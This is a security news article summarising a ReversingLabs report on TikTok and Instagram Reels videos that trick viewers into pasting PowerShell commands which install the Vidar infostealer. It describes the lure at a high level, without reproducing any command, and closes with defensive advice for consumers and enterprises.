A new social engineering campaign is exploiting the popularity of short-form video platforms to deliver password-stealing malware, according to a report from ReversingLabs. Instead of relying on phishing emails, attackers are posting videos on TikTok and Instagram Reels that promise free access to premium subscriptions like Spotify Premium, Windows, Office, and Adobe — an instant red flag, the researchers noted.
How the Attack Works
Victims are instructed to open command-line tools such as PowerShell and paste commands shown in the video. When executed, these commands download and install the Vidar infostealer. This malware targets usernames, passwords, cookies, session tokens, cryptocurrency wallet data, personal files, and other sensitive information.
The method requires more active participation from victims than traditional email phishing — the user must physically input commands into PowerShell. However, the promise of free access to expensive subscriptions exploits current economic pressures, as consumers look for cheap or free alternatives.
Shift in Attack Vectors
| Traditional Email Phishing | New TikTok/Reel Method |
|---|---|
| Clicking a malicious link | Running PowerShell commands |
| Passive victim action | Active victim input (paste command) |
| Low-effort for attacker | Requires victim patience |
| Targets email inboxes | Targets social media feeds |
According to the ReversingLabs researchers quoted in the TechRadar report, "This kind of social engineering is an easy way for threat actors to drive traffic off social media and onto an attacker-controlled malicious website." The attack marks a notable shift from email-based campaigns to video-based delivery.
Defensive Measures
The report emphasizes that social engineering remains the clearest path for attackers to reach victims. The good news is that basic security principles can mitigate risk:
- Use multi-factor authentication to secure accounts.
- Be wary of suspiciously cheap or free products and services.
- Only download software from official vendors.
For enterprise CTOs and cybersecurity leaders, this campaign underscores the need to extend awareness training beyond email to social media platforms. As remote work and personal device usage blur the lines between corporate and personal environments, employees may inadvertently compromise company credentials. It also highlights the importance of restricting administrative tools like PowerShell on non-administrator endpoints.
Implications for Supply Chain Security
While the campaign targets individual consumers, the stolen credentials — especially session tokens and corporate cloud account passwords — could be repurposed for business email compromise or supply chain attacks. Enterprise procurement teams should note that subscription fraud is not limited to Spotify: attackers are also impersonating Microsoft and Adobe products, which are common in corporate environments. Ensuring strict software procurement policies and monitoring for unauthorized download requests is prudent.
Ultimately, the report from ReversingLabs serves as a reminder that attackers evolve their delivery methods but continue to rely on human psychology. Basic account security measures, such as multi-factor authentication and cautious behavior around unrealistic offers, remain effective defenses.
Sources:
